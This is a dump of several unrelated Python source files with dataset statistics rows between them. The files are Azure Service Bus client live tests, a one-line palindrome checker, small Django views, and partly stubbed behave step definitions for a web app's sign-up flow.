@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_receive_batch_with_retrieve_deadletter(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
sender.send(message)
count = 0
messages = receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
message.dead_letter(description="Testing queue deadletter")
count += 1
messages = receiver.fetch_next()
with pytest.raises(InvalidHandlerState):
receiver.fetch_next()
assert count == 10
with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 10
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_session_fail(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with pytest.raises(ValueError):
queue_client.get_receiver(session="test")
with queue_client.get_sender(session="test") as sender:
sender.send(Message("test session sender"))
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_browse_messages_client(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
sender.send(message)
messages = queue_client.peek(5)
assert len(messages) == 5
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_browse_messages_with_receiver(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(5):
message = Message("Test message no. {}".format(i))
sender.send(message)
messages = receiver.peek(5)
assert len(messages) > 0
assert all(isinstance(m, PeekMessage) for m in messages)
for message in messages:
print_message(message)
with pytest.raises(TypeError):
message.complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_browse_empty_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
messages = receiver.peek(10)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_fail_send_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
too_large = "A" * 1024 * 512
try:
results = queue_client.send(Message(too_large))
except MessageSendFailed:
pytest.skip("Open issue for uAMQP on OSX")
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
sender.send(Message(too_large))
with queue_client.get_sender() as sender:
sender.queue_message(Message(too_large))
results = sender.send_pending_messages()
assert len(results) == 1
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_fail_send_batch_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
pytest.skip("TODO: Pending bugfix in uAMQP")
def batch_data():
for i in range(3):
yield str(i) * 1024 * 256
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
results = queue_client.send(BatchMessage(batch_data()))
assert len(results) == 4
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
with queue_client.get_sender() as sender:
with pytest.raises(MessageSendFailed):
sender.send(BatchMessage(batch_data()))
with queue_client.get_sender() as sender:
sender.queue_message(BatchMessage(batch_data()))
results = sender.send_pending_messages()
assert len(results) == 4
assert not results[0][0]
assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_renew_message_locks(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
messages = []
locks = 3
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
with queue_client.get_sender() as sender:
for i in range(locks):
message = Message("Test message no. {}".format(i))
sender.send(message)
messages.extend(receiver.fetch_next())
recv = True
while recv:
recv = receiver.fetch_next()
messages.extend(recv)
try:
assert not message.expired
for m in messages:
time.sleep(5)
initial_expiry = m.locked_until
m.renew_lock()
assert (m.locked_until - initial_expiry) >= timedelta(seconds=5)
finally:
messages[0].complete()
messages[1].complete()
# This magic number is because of a 30 second lock renewal window. Chose 31 seconds because at 30, you'll see "off by .05 seconds" flaky failures
# potentially as a side effect of network delays/sleeps/"typical distributed systems nonsense." In a perfect world we wouldn't have a magic number/network hop but this allows
# a slightly more robust test in absence of that.
assert (messages[2].locked_until - datetime.now()) <= timedelta(seconds=31)
time.sleep((messages[2].locked_until - datetime.now()).total_seconds())
with pytest.raises(MessageLockExpired):
messages[2].complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_queue_client_conn_str_receive_handler_with_autolockrenew(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
queue_client = QueueClient.from_connection_string(
servicebus_namespace_connection_string,
name=servicebus_queue.name,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("{}".format(i))
sender.send(message)
renewer = AutoLockRenew()
messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
for message in receiver:
if not messages:
messages.append(message)
assert not message.expired
renewer.register(message, timeout=60)
print("Registered lock renew thread", message.locked_until, datetime.now())
time.sleep(50)
print("Finished first sleep", message.locked_until)
assert not message.expired
time.sleep(25)
print("Finished second sleep", message.locked_until, datetime.now())
assert message.expired
try:
message.complete()
raise AssertionError("Didn't raise MessageLockExpired")
except MessageLockExpired as e:
assert isinstance(e.inner_exception, AutoLockRenewTimeout)
else:
if message.expired:
print("Remaining messages", message.locked_until, datetime.now())
assert message.expired
with pytest.raises(MessageLockExpired):
message.complete()
else:
assert message.header.delivery_count >= 1
print("Remaining messages", message.locked_until, datetime.now())
messages.append(message)
message.complete()
renewer.shutdown()
assert len(messages) == 11
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_message_time_to_live(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id = uuid.uuid4()
message = Message(content)
message.time_to_live = timedelta(seconds=30)
sender.send(message)
time.sleep(30)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert not messages
with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 1
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', requires_duplicate_detection=True, dead_lettering_on_message_expiration=True)
def test_queue_message_duplicate_detection(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
message_id = uuid.uuid4()
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_sender() as sender:
for i in range(5):
message = Message(str(i))
message.properties.message_id = message_id
sender.send(message)
with queue_client.get_receiver(idle_timeout=5) as receiver:
count = 0
for message in receiver:
print_message(message)
assert message.properties.message_id == message_id
message.complete()
count += 1
assert count == 1
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_message_connection_closed(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
sender.send(message)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 1
with pytest.raises(MessageSettleFailed):
messages[0].complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_message_expiry(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
sender.send(message)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 1
time.sleep(30)
assert messages[0].expired
with pytest.raises(MessageLockExpired):
messages[0].complete()
with pytest.raises(MessageLockExpired):
messages[0].renew_lock()
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=30)
assert len(messages) == 1
print_message(messages[0])
assert messages[0].header.delivery_count > 0
messages[0].complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_message_lock_renew(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message = Message(content)
sender.send(message)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 1
time.sleep(15)
messages[0].renew_lock()
time.sleep(15)
messages[0].renew_lock()
time.sleep(15)
assert not messages[0].expired
messages[0].complete()
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_message_receive_and_delete(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_sender() as sender:
message = Message("Receive and delete test")
sender.send(message)
with queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete) as receiver:
messages = receiver.fetch_next(timeout=10)
assert len(messages) == 1
received = messages[0]
print_message(received)
with pytest.raises(MessageAlreadySettled):
received.complete()
with pytest.raises(MessageAlreadySettled):
received.abandon()
with pytest.raises(MessageAlreadySettled):
received.defer()
with pytest.raises(MessageAlreadySettled):
received.dead_letter()
with pytest.raises(MessageAlreadySettled):
received.renew_lock()
time.sleep(30)
with queue_client.get_receiver() as receiver:
messages = receiver.fetch_next(timeout=10)
for m in messages:
print_message(m)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_message_batch(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
def message_content():
for i in range(5):
yield "Message no. {}".format(i)
with queue_client.get_sender() as sender:
message = BatchMessage(message_content())
sender.send(message)
with queue_client.get_receiver() as receiver:
messages =receiver.fetch_next(timeout=10)
recv = True
while recv:
recv = receiver.fetch_next(timeout=10)
messages.extend(recv)
assert len(messages) == 5
for m in messages:
print_message(m)
m.complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_schedule_message(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
with queue_client.get_receiver() as receiver:
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id = uuid.uuid4()
message = Message(content)
message.properties.message_id = message_id
message.schedule(enqueue_time)
sender.send(message)
messages = receiver.fetch_next(timeout=120)
if messages:
try:
data = str(messages[0])
assert data == content
assert messages[0].properties.message_id == message_id
assert messages[0].scheduled_enqueue_time == enqueue_time
assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
assert len(messages) == 1
finally:
for m in messages:
m.complete()
else:
raise Exception("Failed to receive schdeduled message.")
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_schedule_multiple_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
with queue_client.get_receiver(prefetch=20) as receiver:
with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id_a = uuid.uuid4()
message_a = Message(content)
message_a.properties.message_id = message_id_a
message_id_b = uuid.uuid4()
message_b = Message(content)
message_b.properties.message_id = message_id_b
tokens = sender.schedule(enqueue_time, message_a, message_b)
assert len(tokens) == 2
messages = receiver.fetch_next(timeout=120)
messages.extend(receiver.fetch_next(timeout=5))
if messages:
try:
data = str(messages[0])
assert data == content
assert messages[0].properties.message_id in (message_id_a, message_id_b)
assert messages[0].scheduled_enqueue_time == enqueue_time
assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
assert len(messages) == 2
finally:
for m in messages:
m.complete()
else:
raise Exception("Failed to receive schdeduled message.")
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_cancel_scheduled_messages(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
with queue_client.get_receiver() as receiver:
with queue_client.get_sender() as sender:
message_a = Message("Test scheduled message")
message_b = Message("Test scheduled message")
tokens = sender.schedule(enqueue_time, message_a, message_b)
assert len(tokens) == 2
sender.cancel_scheduled_messages(*tokens)
messages = receiver.fetch_next(timeout=120)
try:
assert len(messages) == 0
except AssertionError:
for m in messages:
print(str(m))
m.complete()
raise
| 45.569255 | 218 | 0.665419 | 5,754 | 56,916 | 6.28554 | 0.061175 | 0.089308 | 0.064368 | 0.031852 | 0.851052 | 0.823375 | 0.80897 | 0.793818 | 0.77767 | 0.766915 | 0 | 0.0083 | 0.25701 | 56,916 | 1,249 | 219 | 45.569255 | 0.846954 | 0.01576 | 0 | 0.785784 | 0 | 0 | 0.044708 | 0.000464 | 0 | 0 | 0 | 0 | 0.098345 | 1 | 0.036027 | false | 0.000974 | 0.012658 | 0 | 0.050633 | 0.030185 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e5f296df789b51bee9041afcb8974301ae19afa2 | 95 | py | Python | CA117/Lab_3/palindrome_21.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 6 | 2016-02-04T00:15:20.000Z | 2019-10-13T13:53:16.000Z | CA117/Lab_3/palindrome_21.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 2 | 2016-03-14T04:01:36.000Z | 2019-10-16T12:45:34.000Z | CA117/Lab_3/palindrome_21.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 10 | 2016-02-09T14:38:32.000Z | 2021-05-25T08:16:26.000Z | (lambda s:print(s==s[::-1]))(__import__('re').sub(r"\W","",__import__('sys').argv[1].lower()))
| 47.5 | 94 | 0.578947 | 16 | 95 | 2.9375 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021505 | 0.021053 | 95 | 1 | 95 | 95 | 0.483871 | 0 | 0 | 0 | 0 | 0 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
006e22c7ee269af2d54d7080b95059d1a81c61c5 | 236 | py | Python | rain/rain/views.py | akbernamazi/Safer_Cities | e1043d3e04ae38ad7395f441e0bb6ba5b87d8291 | [
"MIT"
] | null | null | null | rain/rain/views.py | akbernamazi/Safer_Cities | e1043d3e04ae38ad7395f441e0bb6ba5b87d8291 | [
"MIT"
] | null | null | null | rain/rain/views.py | akbernamazi/Safer_Cities | e1043d3e04ae38ad7395f441e0bb6ba5b87d8291 | [
"MIT"
] | null | null | null | from django.shortcuts import redirect
from django.shortcuts import render,HttpResponse,redirect
def login_redirect(request):
return redirect('account/validate')
def about(request):
return render(request,'accounts/about.html') | 29.5 | 58 | 0.79661 | 29 | 236 | 6.448276 | 0.551724 | 0.106952 | 0.203209 | 0.26738 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110169 | 236 | 8 | 59 | 29.5 | 0.890476 | 0 | 0 | 0 | 0 | 0 | 0.147679 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
00980eca0aeb5c0f9a29b89fd321df6a9cc2b121 | 7,475 | py | Python | features/steps/signUp.py | FarmingdaleTUTR/nectr | 39b6e2b65bc9d9b1877f1b7c31258b2558fff371 | [
"MIT"
] | 1 | 2017-05-07T11:40:22.000Z | 2017-05-07T11:40:22.000Z | features/steps/signUp.py | FarmingdaleTUTR/nectr | 39b6e2b65bc9d9b1877f1b7c31258b2558fff371 | [
"MIT"
] | 83 | 2017-03-17T15:00:02.000Z | 2017-05-08T02:59:32.000Z | features/steps/signUp.py | FarmingdaleTUTR/nectr | 39b6e2b65bc9d9b1877f1b7c31258b2558fff371 | [
"MIT"
] | 2 | 2017-04-04T22:54:16.000Z | 2017-05-07T05:51:38.000Z | from behave import *
from hamcrest import *
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from nectr.users.models import User
from nectr.users.tests.factories import UserFactory
use_step_matcher("parse")
@given("{name} is not yet registered")
def step_impl(context, name):
"""
:param name: name of user
:type context: behave.runner.Context
"""
UserFactory(username=name)
assert_that(User.objects.all(), )
@given("Charlie is on the homepage")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("Charlie clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step('is asked "{text}"')
def step_impl(context, text):
"""
:type context: behave.runner.Context
"""
assert False
@step("he says no")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("Mike is on the homepage")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("mike clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step("he says yes")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@then('he is redirected to the "sign up form"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("Enoc is on the seacrch the hive page")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("enoc clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@then('is redirected to the "sign up" form')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("brandon is on the about nectr page")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("brandon clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("juan is on the how it works page")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when("juan clicks on sign up link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@given("Spongebob is on home page of nectr")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.get(context.server_url + "/")
@step("Spongebob does not have nectR account")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
pass
@when("Spongebob clicks menu")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_name("menu").click()
@step('Spongebob clicks "Sign Up" button')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('sign-up-link').click()
@step('title of the page is "Signup"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
WebDriverWait(context.driver, 10).until(
EC.title_contains("Signup"))
current_page_title = context.driver.title
assert_that(current_page_title, contains_string("Signup"))
@step('page contains an h1 whos text is "Sign up"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_tag_name('h1')
@when("Spongebob clicks on username text field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('id_username').click()
@step('Spongebob enters username "{some_text}"')
def step_impl(context, some_text):
"""
:type some_text: str
:type context: behave.runner.Context
"""
element = context.driver.find_element_by_id("id_username")
element.send_keys(some_text)
@step("Spongebob clicks on E-mail text field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('id_email').click()
@step("Spongebob clicks on password1 text field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('id_password1').click()
@step('Spongbob enters password1 "some_text"')
def step_impl(context, some_text):
"""
:type context: behave.runner.Context
"""
element = context.driver.find_element_by_id("id_password1")
element.send_keys(some_text)
@step("Spongbob leaves this text field blank")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
context.driver.find_element_by_id('id_password2').clear()
@step('title of the page is "Verify Your E-mail Address"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step('page contains an h1 whos text is "Verify Your E-mail Address"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@when('Spongebob checks his email "ayouf@farmingdale.edu"')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step('Spongebob opens "confirm account" email')
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step("Spongebob clicks account confirmation link")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
assert False
@step('Spongebob enters email "{some_text}"')
def step_impl(context, some_text):
"""
:type some_text: str
:type context: behave.runner.Context
"""
element = context.driver.find_element_by_id("id_email")
element.send_keys(some_text)
@step("Spongebob clicks on Repeat Password field")
def step_impl(context):
"""
:type context: behave.runner.Context
"""
